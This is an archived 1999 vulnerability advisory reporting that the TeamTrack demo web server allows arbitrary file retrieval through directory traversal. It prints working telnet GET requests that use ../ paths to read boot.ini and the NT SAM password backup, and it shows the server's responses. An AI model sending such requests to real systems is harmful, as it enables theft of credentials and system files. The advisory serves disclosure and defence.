Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Servers :: web1977.htm

TeamTrack webserver (demo license release) retrieve any file



6th Oct 1999 [SBWID-1977]
COMMAND

	    TeamTrack webserver

	

	

SYSTEMS AFFECTED

	    TeamTrack webserver (demo license release)

	

PROBLEM

	    \".rain.forest.puppy.\"   found   following.     TeamTrack   server,

	    published  by  TeamShare,  is  available  from  www.teamtrack.com.

	    It\'s purpose, to quote the  web search engine spam located  at the

	    bottom of their website:

	
	        teamshare  teamtrack  web  based  defect  bug  tracking  track

	        teamshare  teamtrack  web  based  defect  bug  tracking  track

	

	    The problem is with the included web server they use to access the

	    database--it  allows  unrestricted  retrieval  of  any file on the

	    filesystem.  Observe this session:

	
	        [rfp@wicca.rfp.labs rfp]$ telnet lughnasad.rfp.labs 80

	        Trying 10.10.10.9...

	        Connected to lughnasad.rfp.labs.

	        Escape character is \'^]\'.

	        GET /../../../../../../../boot.ini HTTP/1.0

	

	        HTTP/1.0 200 OK

	        Server: TeamTrack/3.00(3097)

	        Date: Sat, 02 Oct 1999 04:19:48 GMT

	        Last-Modified: Sat, 02 Oct 1999 04:19:48 GMT

	        Accept-Ranges: bytes

	        Last-Modified: Thu, 29 Jul 1999 03:56:08 GMT

	        Content-Length: 382

	        Content-Type: text/html

	

	        [boot loader]

	        timeout=30

	        default=multi(0)disk(0)rdisk(0)partition(1)WINNT

	        [operating systems]

	        multi(0)disk(0)rdisk(0)partition(1)WINNT=\"Windows NT Server, Enterprise

	        Edition Version 4.00\"

	        multi(0)disk(0)rdisk(0)partition(1)WINNT=\"Windows NT Server, Enterprise

	        Edition Version 4.00 [VGA mode]\" /basevideo /sos

	        Connection closed by foreign host.

	

	    In case you haven\'t figured it out already, it runs on NT, and  as

	    a service.  This means it has system access to any file.

	
	        [rfp@wicca.rfp.labs rfp]$ telnet lughnasad.rfp.labs 80

	        Trying 10.10.10.9...

	        Connected to lughnasad.rfp.labs.

	        Escape character is \'^]\'.

	        GET /../../../../../winnt/repair/sam._ HTTP/1.0

	

	        HTTP/1.0 200 OK

	        Server: TeamTrack/3.00(3097)

	        Date: Sat, 02 Oct 1999 04:40:30 GMT

	        Last-Modified: Sat, 02 Oct 1999 04:40:30 GMT

	        Accept-Ranges: bytes

	        Last-Modified: Thu, 29 Jul 1999 03:43:10 GMT

	        Content-Length: 3330

	        Content-Type: text/html

	

	        ,IPř&f $$hive$$.tm}h▒ <....data cut...don\'t want you seeing my SAM!...>

	

	

SOLUTION

	    TeamTrack   also   includes   the    option   to   use    Netscape

	    FastTrack/Enterprise or  IIS instead.   Look into  this.   The SP4

	    readme includes information/instructions on how to migrate to  one

	    of these webservers.

	

	    Again, this Web server is installed and set up to be launched when

	    TeamTrack is installed ONLY IF one of the recommended Web  servers

	    (IIS or Netscape Enterprise/FastTrack) is not already installed on

	    the target computer, greatly minimizing the risk of the web server

	    being enabled on a production computer.

	

	    This was resolved  in TeamTrack 4.0  software, entering beta  now.

	    This software version should be generally available during January

	    2000.

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH